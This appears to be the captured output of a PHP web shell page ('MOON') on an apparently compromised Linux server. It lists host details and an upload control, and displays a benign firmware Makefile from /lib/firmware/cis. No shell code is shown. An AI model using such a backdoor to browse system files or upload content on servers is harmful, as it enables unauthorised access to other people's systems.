MOON
Server: Apache
System: Linux cl1170g 4.19.62-mod-std-ipv6-64-rescue #828825 SMP Tue Jul 30 13:54:49 UTC 2019 x86_64
User: wh0f20bb (1057)
PHP: 5.6.40
Disabled: NONE
Upload Files
File: //lib/firmware/cis/Makefile
# The pack_cis tool from cis-tools
# <http://git.kernel.org/?p=utils/cis-tools/cis-tools.git>.
PACK_CIS = pack_cis

CIS_SRC := $(wildcard src/*.cis)
CIS_BIN := $(notdir $(CIS_SRC))

all: $(CIS_BIN)

%.cis: src/%.cis
	$(PACK_CIS) -o $@ $<

clean:
	rm -f $(CIS_BIN)